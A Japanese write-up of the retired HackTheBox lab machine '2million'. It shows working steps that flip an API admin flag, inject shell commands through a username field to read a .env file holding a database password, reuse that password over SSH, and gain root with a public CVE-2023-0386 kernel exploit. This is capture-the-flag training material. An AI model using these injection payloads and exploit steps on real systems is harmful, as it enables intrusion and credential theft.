- Guided mode 使用
- Retired Free Machine
間がだいぶ空いたのでちょっとリハビリがてら
nmap
└─$ nmap 10.10.11.221 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-07 09:36 JST Nmap scan report for 10.10.11.221 Host is up (0.25s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 666.89 seconds
Webサーバー
~/dev/hack 🐶💭❯ curl --verbose http://10.10.11.221 * Trying 10.10.11.221:80... * Connected to 10.10.11.221 (10.10.11.221) port 80 ... < HTTP/1.1 301 Moved Permanently < Server: nginx ... < Location: http://2million.htb/
リダイレクトかかってる
2million.htb
というホストを想定してそう
~/dev/hack 🐶💭❯ cat /etc/hosts | tail -n 1 10.10.11.221 2million.htb
色々調整面倒なのでhostsに書いた
ホスト外からのアクセスにリダイレクトかけてるだけっぽい
/invite から登録
/js/inviteapi.min.js
ちょっとトリッキーだけどevalで組み立てられてる グローバルに展開されてるっぽいのでブラウザのコンソールで打てる
makeInviteCode() undefined Object { 0: 200, success: 1, data: {…}, hint: "Data is encrypted ... We should probbably check the encryption type in order to decrypt it..." }
makeInviteCode()
だと思う。
In order to generate the invite code, make a POST request to /api/v1/invite/generate
~/dev/hack 🐶💭❯ curl -X POST http://2million.htb/api/v1/invite/generate {"0":200,"success":1,"data":{"code":"RjIxNkktMzRaRkwtTVFBTUQtMjFMQTg=","format":"encoded"}}%
たぶんBASE64 => Cyberchefとかでデコードして F216I-34ZFL-MQAMD-21LA8
ログイン後、Connection Packを探す。たぶんVPNの話なので探すとAccessの中にあった
GET /api/v1/user/vpn/generate
http://2million.htb/api/v1 を見るとうっかりAPIがJSONでまとまっており、その中に admin 関連のものもある
PUT /api/v1/admin/settings/update "Update user settings"
これが怪しいが、まずauth周りを調べる
GET /api/v1/user/auth GET /api/v1/admin/auth
user/authを参考にadmin/authの挙動を探る。セッションはCookieっぽいので、
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/user/auth {"loggedin":true,"username":"skyriser","is_admin":0} $ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/auth {"message":false}
それっぽいリクエストを投げる
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/settings/update -XPUT -H 'Content-Type: application/json' -d '{"username":"skyriser","is_admin":"1"}' --verbose ... * Connection #0 to host 2million.htb left intact {"status":"danger","message":"Missing parameter: email"}
JSONでリクエスト受け付けてるっぽい。とりあえずadminにしちゃう
adminで色々やってみるが、関係ない気がする
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/settings/update -XPUT -H 'Content-Type: application/json' -d '{"username":"skyriser","is_admin":1,"email":"skyriser@example.com"}' --verbose {"id":15,"username":"skyriser","is_admin":1} $ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/auth {"message":true}
あと試してないのはこれ。
POST /api/v1/admin/vpn/generate Generate VPN for specific user
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin"}' ...
普通に他人のOpenVPNがダウンロード出来るけど、ディレクトリトラバーサル問題っぽいからusernameに細工すれば悪いことできそう
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;ls;"}' Database.php Router.php VPN assets controllers css fonts images index.php js views
出来た。
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;whoami;"}' www-data $ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;ls -la;"}' total 56 drwxr-xr-x 10 root root 4096 Jun 8 02:40 . drwxr-xr-x 3 root root 4096 Jun 6 2023 .. -rw-r--r-- 1 root root 87 Jun 2 2023 .env -rw-r--r-- 1 root root 1237 Jun 2 2023 Database.php -rw-r--r-- 1 root root 2787 Jun 2 2023 Router.php drwxr-xr-x 5 root root 4096 Jun 8 02:40 VPN drwxr-xr-x 2 root root 4096 Jun 6 2023 assets drwxr-xr-x 2 root root 4096 Jun 6 2023 controllers drwxr-xr-x 5 root root 4096 Jun 6 2023 css drwxr-xr-x 2 root root 4096 Jun 6 2023 fonts drwxr-xr-x 2 root root 4096 Jun 6 2023 images -rw-r--r-- 1 root root 2692 Jun 2 2023 index.php drwxr-xr-x 3 root root 4096 Jun 6 2023 js drwxr-xr-x 2 root root 4096 Jun 6 2023 views
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;ls -la /home/admin;"}' total 32 drwxr-xr-x 4 admin admin 4096 Jun 7 14:18 . drwxr-xr-x 3 root root 4096 Jun 6 2023 .. lrwxrwxrwx 1 root root 9 May 26 2023 .bash_history -> /dev/null -rw-r--r-- 1 admin admin 220 May 26 2023 .bash_logout -rw-r--r-- 1 admin admin 3771 May 26 2023 .bashrc drwx------ 2 admin admin 4096 Jun 6 2023 .cache -rw------- 1 admin admin 0 Jun 7 14:18 .lesshsQ -rw-r--r-- 1 admin admin 807 May 26 2023 .profile drwx------ 2 admin admin 4096 Jun 6 2023 .ssh -rw-r----- 1 root admin 33 Jun 7 08:54 user.txt
user.txtはwww-dataからはアクセス出来ないようになってる。
ヒントは .env
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;cat .env;"}' DB_HOST=127.0.0.1 DB_DATABASE=htb_prod DB_USERNAME=admin DB_PASSWORD=SuperDuperPass123
user.txt
SSHは空いているので、↑のパスワード試してみる
$ ssh admin@2million.htb admin@2million.htb's password: Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.70-051570-generic x86_64) admin@2million:~$ cat user.txt XXX
バッチリ入れてしまった。なるほどね。
メール周りを見る
次のヒントは
What is the email address of the sender of the email sent to admin?
メールスプールを見てみる
admin@2million:/var/spool/mail$ ls admin admin@2million:/var/spool/mail$ pwd /var/spool/mail ... Subject: Urgent: Patch System OS ... There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty.
脆弱性あるよって言ってる。
- CVE-2023-0386
これっぽいなー。privilege escalationって書いてあるし。
Priviledge Escalationする
このあたりを使わせて貰う
$ scp CVE-2023-0386-main.zip admin@2million.htb:/home/admin/ admin@2million.htb's password: CVE-2023-0386-main.zip 100% 11KB 30.6KB/s 00:00
admin@2million:~$ ls CVE-2023-0386-main.zip user.txt admin@2million:~$ unzip CVE-2023-0386-main.zip Archive: CVE-2023-0386-main.zip acc49811a9083381c28db9ec296774e6a82be419 creating: CVE-2023-0386-main/ inflating: CVE-2023-0386-main/Makefile inflating: CVE-2023-0386-main/README.md inflating: CVE-2023-0386-main/exp.c inflating: CVE-2023-0386-main/fuse.c inflating: CVE-2023-0386-main/getshell.c creating: CVE-2023-0386-main/ovlcap/ extracting: CVE-2023-0386-main/ovlcap/.gitkeep creating: CVE-2023-0386-main/test/ inflating: CVE-2023-0386-main/test/fuse_test.c inflating: CVE-2023-0386-main/test/mnt inflating: CVE-2023-0386-main/test/mnt.c
# Term 1 dmin@2million:~/CVE-2023-0386-main$ ./fuse ./ovlcap/lower ./gc [+] len of gc: 0x3ee0 [+] readdir ...
# Term 2 admin@2million:~/CVE-2023-0386-main$ ./exp uid:1000 gid:1000 [+] mount success total 8 drwxrwxr-x 1 root root 4096 Jun 8 03:17 . drwxrwxr-x 6 root root 4096 Jun 8 03:17 .. -rwsrwxrwx 1 nobody nogroup 16096 Jan 1 1970 file [+] exploit success! To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. root@2million:~/CVE-2023-0386-main# whoami root
やったね
root.txt
root@2million:~# cd /root/ root@2million:/root# pwd /root root@2million:/root# ls root.txt snap thank_you.json root@2million:/root# cat root.txt XXX